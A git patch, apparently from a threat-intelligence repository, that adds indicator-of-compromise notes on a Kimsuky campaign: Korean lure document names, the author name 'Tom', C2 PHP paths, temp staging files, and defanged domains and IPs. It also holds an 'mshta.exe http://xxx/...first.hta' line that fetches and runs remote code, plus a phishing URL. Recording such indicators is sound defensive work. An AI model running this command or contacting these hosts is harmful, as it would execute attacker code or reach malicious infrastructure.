From 7207c6819319c3f17f77b49901adddddf4585c40 Mon Sep 17 00:00:00 2001
From: blackorbird <137812951@qq.com>
Date: Wed, 3 Apr 2019 13:36:29 +0800
Subject: [PATCH] Update and rename mark-ioc to aptnote0403

---
 kimsuky/aptnote0403 | 29 +++++++++++++++++++++++++++++
 kimsuky/mark-ioc    |  7 -------
 2 files changed, 29 insertions(+), 7 deletions(-)
 create mode 100644 kimsuky/aptnote0403
 delete mode 100644 kimsuky/mark-ioc

diff --git a/kimsuky/aptnote0403 b/kimsuky/aptnote0403
new file mode 100644
index 0000000..7385bb4
--- /dev/null
+++ b/kimsuky/aptnote0403
@@ -0,0 +1,29 @@
+mark
+
+20190403
+Kimsuky Organization, Operation Stealth Power Silence Operation
+https://blog.alyac.co.kr/2234
+
+hwp: 
+3.17 미국의 편타곤 비밀 국가안보회의.hwp
+최근 한반도 관련 주요국 동향.hwp
+the creator name  "Tom"
+computer name : Tom
+
+mshta.exe http://xxx/shop/price/com/first.hta
+http://xxx/shop/price/com/expres.php?op=1
+http://xxx/shop/kcp/js/com/expres.php?op=1
+cow.php
+moonx.hta
+
+upload.php
+$env:temp\processlist.txt 
+$env:temp\ttmuprc.ssa 
+$env:temp\servcicelist.txt
+
+PDF:
+enindi25-142.godo.co[.]kr（106.249.25.142 ）
+phishing:
+tcjst.com/img/dot[.]gif
+
+Operation Stealth Power related Low Kick （https://blog.alyac.co.kr/2209）
diff --git a/kimsuky/mark-ioc b/kimsuky/mark-ioc
deleted file mode 100644
index e454c5a..0000000
--- a/kimsuky/mark-ioc
+++ /dev/null
@@ -1,7 +0,0 @@
-mark
-
-20190403
-
-hwp: 최근 한반도 관련 주요국 동향.hwp
-the creator name  "Tom"
-computer name : Tom